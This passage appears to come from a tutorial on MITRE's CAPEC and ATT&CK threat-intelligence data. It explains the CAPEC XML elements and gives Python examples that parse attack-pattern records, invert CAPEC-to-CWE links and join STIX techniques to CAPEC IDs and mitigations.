<Related_Weakness CWE_ID="302"/>
<Related_Weakness CWE_ID="118"/>
<Related_Weakness CWE_ID="119"/>
<Related_Weakness CWE_ID="74"/>
<Related_Weakness CWE_ID="99"/>
<Related_Weakness CWE_ID="20"/>
<Related_Weakness CWE_ID="680"/>
<Related_Weakness CWE_ID="733"/>
<Related_Weakness CWE_ID="697"/>
</Related_Weaknesses>
<Taxonomy_Mappings>
<Taxonomy_Mapping Taxonomy_Name="OWASP Attacks">
<Entry_Name>Buffer Overflow via Environment Variables</Entry_Name>
</Taxonomy_Mapping>
</Taxonomy_Mappings>
<References>
<Reference External_Reference_ID="REF-1"/>
<Reference External_Reference_ID="REF-2"/>
</References>
<Content_History>
<Submission>
<Submission_Name>CAPEC Content Team</Submission_Name>
<Submission_Organization>The MITRE Corporation</Submission_Organization>
<Submission_Date>2014-06-23</Submission_Date>
</Submission>
<Modification>
<Modification_Name>CAPEC Content Team</Modification_Name>
<Modification_Organization>The MITRE Corporation</Modification_Organization>
<Modification_Date>2017-01-09</Modification_Date>
<Modification_Comment>Updated Related_Attack_Patterns</Modification_Comment>
</Modification>
<Modification>
<Modification_Name>CAPEC Content Team</Modification_Name>
<Modification_Organization>The MITRE Corporation</Modification_Organization>
<Modification_Date>2018-07-31</Modification_Date>
<Modification_Comment>Updated References</Modification_Comment>
</Modification>
<Modification>
<Modification_Name>CAPEC Content Team</Modification_Name>
<Modification_Organization>The MITRE Corporation</Modification_Organization>
<Modification_Date>2020-07-30</Modification_Date>
<Modification_Comment>Updated Mitigations</Modification_Comment>
</Modification>
<Modification>
<Modification_Name>CAPEC Content Team</Modification_Name>
<Modification_Organization>The MITRE Corporation</Modification_Organization>
<Modification_Date>2020-12-17</Modification_Date>
<Modification_Comment>Updated Taxonomy_Mappings</Modification_Comment>
</Modification>
<Modification>
<Modification_Name>CAPEC Content Team</Modification_Name>
<Modification_Organization>The MITRE Corporation</Modification_Organization>
<Modification_Date>2021-10-21</Modification_Date>
<Modification_Comment>Updated Execution_Flow, Extended_Description</Modification_Comment>
</Modification>
<Modification>
<Modification_Name>CAPEC Content Team</Modification_Name>
<Modification_Organization>The MITRE Corporation</Modification_Organization>
<Modification_Date>2022-02-22</Modification_Date>
<Modification_Comment>Updated Description</Modification_Comment>
</Modification>
<Modification>
<Modification_Name>CAPEC Content Team</Modification_Name>
<Modification_Organization>The MITRE Corporation</Modification_Organization>
<Modification_Date>2022-09-29</Modification_Date>
<Modification_Comment>Updated Example_Instances</Modification_Comment>
</Modification>
</Content_History>
</Attack_Pattern>
<Related_Attack_Patterns> contains one or more child elements, each describing another attack pattern related to this one.
The Nature attribute gives the nature of the relationship; here it is "ChildOf", meaning this pattern is a child of the referenced pattern.
The CAPEC_ID attribute gives the CAPEC number of the related pattern; here "100".
<Execution_Flow> is the parent element holding the attack's execution flow. Here it contains four <Attack_Step> elements, each describing one step of the attack. Each <Attack_Step> contains the following child elements:
a <Step> element giving the step's sequence number;
a <Phase> element giving the phase the step belongs to (Explore, Experiment or Exploit);
a <Description> element describing the step;
and optionally one or more <Technique> elements listing concrete ways to carry the step out (steps 2 and 3 above).
<Prerequisites> holds the preconditions and factors the attack requires.
<Skills_Required> holds the skill levels needed to carry out the attack; each <Skill> element has a Level attribute and a short explanation of what that level achieves.
<Indicators> holds <Indicator> elements describing conditions that indicate the attack is taking place.
<Consequences> holds the consequences of the attack.
The <Scope> element gives the scope of a consequence; one <Consequence> may contain several <Scope> elements, one per affected security property.
The <Impact> element gives the impact of the consequence.
The <Note> element gives additional explanation of the consequence.
<Mitigations> holds descriptions of the mitigations.
<Example_Instances> holds example instances; each <Example> element contains an xhtml:p element with the description of the instance and the related CVE number (the CVE appears only in free text, so it has to be extracted from the paragraph).
<Related_Weaknesses> lists the IDs of the CWEs related to this attack pattern (CWE_ID attribute); this is the CAPEC-to-CWE link.
<Taxonomy_Mappings> holds the mappings between this attack and other classification systems.
The Taxonomy_Name attribute is "OWASP Attacks", i.e. the OWASP attack classification.
The <Entry_Name> element gives the name of the attack in the OWASP attack classification.
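Parsing the attack pattern is the same ElementTree work as for CWE; what is worth showing beyond that is the join direction. CAPEC stores CAPEC-to-CWE edges, but a graph query usually starts from a weakness ("which attack patterns exploit CWE-119?"), so the index has to be inverted. The following is an added example, not code from the original page or the project it describes: it parses the execution flow, the related CWEs, the CVEs mentioned in the example text, and builds the CWE-to-CAPEC index. SAMPLE_XML is a constructed, abridged copy of CAPEC-10 shown above plus an abridged CAPEC-100 (Overflow Buffers, its parent) carrying two of its related CWEs; the catalog root declares the CAPEC 3.x default namespace and the xhtml prefix used in Example_Instances.

```python
# Added example (not the project's own code): parse CAPEC attack patterns and
# invert the CAPEC -> CWE links into a CWE -> CAPEC index. SAMPLE_XML is a
# constructed, abridged copy of CAPEC-10 shown above plus an abridged CAPEC-100;
# nothing is downloaded.
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

SAMPLE_XML = """<?xml version="1.0"?>
<Attack_Pattern_Catalog xmlns="http://capec.mitre.org/capec-3"
                        xmlns:xhtml="http://www.w3.org/1999/xhtml" Version="3.9">
 <Attack_Patterns>
  <Attack_Pattern ID="10" Name="Buffer Overflow via Environment Variables" Abstraction="Detailed" Status="Draft">
   <Likelihood_Of_Attack>High</Likelihood_Of_Attack>
   <Typical_Severity>High</Typical_Severity>
   <Related_Attack_Patterns>
    <Related_Attack_Pattern Nature="ChildOf" CAPEC_ID="100"/>
   </Related_Attack_Patterns>
   <Execution_Flow>
    <Attack_Step><Step>1</Step><Phase>Explore</Phase><Description>[Identify target application] ...</Description></Attack_Step>
    <Attack_Step><Step>2</Step><Phase>Experiment</Phase><Description>[Find injection vector] ...</Description>
     <Technique>Change the values of environment variables thought to be used by the application to contain excessive data.</Technique></Attack_Step>
   </Execution_Flow>
   <Related_Weaknesses>
    <Related_Weakness CWE_ID="120"/>
    <Related_Weakness CWE_ID="119"/>
   </Related_Weaknesses>
   <Example_Instances>
    <Example><xhtml:p>A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable. See also: CVE-1999-0906</xhtml:p></Example>
   </Example_Instances>
  </Attack_Pattern>
  <Attack_Pattern ID="100" Name="Overflow Buffers" Abstraction="Standard" Status="Draft">
   <Related_Weaknesses>
    <Related_Weakness CWE_ID="120"/>
    <Related_Weakness CWE_ID="119"/>
   </Related_Weaknesses>
  </Attack_Pattern>
 </Attack_Patterns>
</Attack_Pattern_Catalog>
"""


def strip_namespaces(root: ET.Element) -> ET.Element:
    """Drop the {uri} prefix so the CAPEC default namespace and the xhtml
    prefix inside Example_Instances do not get in the way of plain tag names."""
    for el in root.iter():
        el.tag = el.tag.rsplit("}", 1)[-1]
    return root


def parse_pattern(ap: ET.Element) -> dict:
    return {
        "id": "CAPEC-" + ap.get("ID"),
        "name": ap.get("Name"),
        "abstraction": ap.get("Abstraction"),
        "likelihood": ap.findtext("Likelihood_Of_Attack"),
        "severity": ap.findtext("Typical_Severity"),
        "child_of": ["CAPEC-" + r.get("CAPEC_ID")
                     for r in ap.iterfind("Related_Attack_Patterns/Related_Attack_Pattern")
                     if r.get("Nature") == "ChildOf"],
        "steps": [
            {"step": int(s.findtext("Step")), "phase": s.findtext("Phase"),
             "description": s.findtext("Description"),
             "techniques": [t.text for t in s.iterfind("Technique")]}
            for s in ap.iterfind("Execution_Flow/Attack_Step")
        ],
        "cwes": ["CWE-" + r.get("CWE_ID")
                 for r in ap.iterfind("Related_Weaknesses/Related_Weakness")],
        # CVEs are only mentioned in free text, so harvest them with a regex
        "example_cves": sorted({m for ex in ap.iterfind("Example_Instances/Example")
                                for m in CVE_RE.findall("".join(ex.itertext()))}),
    }


def parse_catalog(xml_bytes: bytes) -> dict:
    """Map 'CAPEC-<id>' -> record for every Attack_Pattern in the catalog."""
    root = strip_namespaces(ET.fromstring(xml_bytes))
    return {p["id"]: p for p in map(parse_pattern, root.iter("Attack_Pattern"))}


def cwe_to_capec(patterns: dict) -> dict:
    """Invert the CAPEC -> CWE edges: 'CWE-<id>' -> sorted list of CAPEC IDs."""
    index = defaultdict(list)
    for p in patterns.values():
        for cwe in p["cwes"]:
            index[cwe].append(p["id"])
    return {cwe: sorted(ids) for cwe, ids in index.items()}


if __name__ == "__main__":
    catalog = parse_catalog(SAMPLE_XML.encode())
    print(cwe_to_capec(catalog))
```

With the real catalog, load it with parse_catalog(open("capec_latest.xml", "rb").read()); the inverted index is what a "CVE -> CWE -> CAPEC" traversal consults after the CWE IDs have been taken from the NVD problemtype field.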
Download URL: https://github.com/mitre/cti/raw/master/enterprise-attack/enterprise-attack.json
The other ATT&CK datasets (mobile-attack, ics-attack) can be downloaded from the same GitHub project. The file is a STIX 2 bundle; an excerpt of one attack-pattern object:
"external_references": [
{
"source_name": "mitre-attack",
"external_id": "T1148",
"url": "https://attack.mitre.org/techniques/T1148"
},
{
"external_id": "CAPEC-13",
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/13.html"
}
],
The object is rather long so only this part is excerpted: the external_references array holds the ATT&CK technique ID (external_id of the entry whose source_name is "mitre-attack") and the direct link to CAPEC (the entry whose source_name is "capec"). That is the technique-to-CAPEC association.
The object also carries a description, but mitigations and detections are not nested inside it: mitigations are separate course-of-action objects joined to the technique by relationship objects with relationship_type "mitigates", and detection guidance lives in the technique's x_mitre_detection field (newer bundles additionally use x-mitre-data-component objects joined by "detects" relationships). Objects may also be marked "revoked" or "x_mitre_deprecated"; T1148 itself is no longer a current technique in recent ATT&CK versions, so filter these out unless you deliberately want historical entries.
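To make the structure above concrete, the following is an added example, not code from the original page or the project it describes: it reads a STIX bundle, maps each technique ID to its CAPEC IDs, resolves mitigations through the "mitigates" relationship objects, and skips revoked or deprecated objects unless asked not to. SAMPLE_BUNDLE is constructed: the T1148 external_references are the ones quoted above, while the STIX ids, the course-of-action and the relationship are placeholders rather than real ATT&CK objects, and "revoked" is set on the technique to exercise the filtering step. load_bundle() reads a real downloaded enterprise-attack.json.

```python
# Added example (not the project's own code): read an ATT&CK STIX bundle such as
# enterprise-attack.json, map techniques to CAPEC IDs, and resolve mitigations,
# which are separate course-of-action objects joined to the technique by
# "mitigates" relationship objects rather than nested inside it.
# SAMPLE_BUNDLE is constructed: the T1148 external_references are the ones quoted
# above; the STIX ids, the course-of-action and the relationship are placeholders
# (not real ATT&CK objects), and "revoked" is set to show the filtering step.
import json
from collections import defaultdict

SAMPLE_BUNDLE = {
    "type": "bundle",
    "objects": [
        {
            "type": "attack-pattern",
            "id": "attack-pattern--00000000-0000-4000-8000-000000000001",  # placeholder
            "name": "HISTCONTROL",
            "description": "...",
            "revoked": True,
            "external_references": [
                {"source_name": "mitre-attack", "external_id": "T1148",
                 "url": "https://attack.mitre.org/techniques/T1148"},
                {"external_id": "CAPEC-13", "source_name": "capec",
                 "url": "https://capec.mitre.org/data/definitions/13.html"},
            ],
        },
        {
            "type": "course-of-action",
            "id": "course-of-action--00000000-0000-4000-8000-000000000002",  # placeholder
            "name": "Constructed mitigation",
        },
        {
            "type": "relationship",
            "id": "relationship--00000000-0000-4000-8000-000000000003",  # placeholder
            "relationship_type": "mitigates",
            "source_ref": "course-of-action--00000000-0000-4000-8000-000000000002",
            "target_ref": "attack-pattern--00000000-0000-4000-8000-000000000001",
        },
    ],
}


def load_bundle(path: str) -> dict:
    """Read a downloaded STIX bundle (e.g. enterprise-attack.json)."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def attack_id(obj: dict):
    """The Txxxx / Mxxxx identifier lives in the 'mitre-attack' external
    reference, not in the STIX id, so look it up there."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def is_active(obj: dict) -> bool:
    """Revoked and deprecated objects stay in the bundle for history."""
    return not obj.get("revoked", False) and not obj.get("x_mitre_deprecated", False)


def technique_to_capec(bundle: dict, include_revoked: bool = False) -> dict:
    """'T1148' -> ['CAPEC-13', ...] for every attack-pattern in the bundle."""
    out = {}
    for obj in bundle["objects"]:
        if obj.get("type") != "attack-pattern":
            continue
        if not include_revoked and not is_active(obj):
            continue
        tid = attack_id(obj)
        capecs = [r["external_id"] for r in obj.get("external_references", [])
                  if r.get("source_name") == "capec"]
        if tid:
            out[tid] = capecs
    return out


def technique_mitigations(bundle: dict, include_revoked: bool = False) -> dict:
    """Join course-of-action --mitigates--> attack-pattern: 'T1148' -> [names]."""
    by_stix_id = {o["id"]: o for o in bundle["objects"]}
    out = defaultdict(list)
    for obj in bundle["objects"]:
        if obj.get("type") != "relationship" or obj.get("relationship_type") != "mitigates":
            continue
        src = by_stix_id.get(obj["source_ref"])
        tgt = by_stix_id.get(obj["target_ref"])
        if not src or not tgt or src.get("type") != "course-of-action":
            continue
        if not include_revoked and not (is_active(src) and is_active(tgt)):
            continue
        tid = attack_id(tgt)
        if tid:
            out[tid].append(src["name"])
    return dict(out)


if __name__ == "__main__":
    print(technique_to_capec(SAMPLE_BUNDLE, include_revoked=True))
    print(technique_mitigations(SAMPLE_BUNDLE, include_revoked=True))
```

The same relationship join, with relationship_type "uses" and source objects of type intrusion-set or malware, yields the group-to-technique and malware-to-technique edges the bundle also contains.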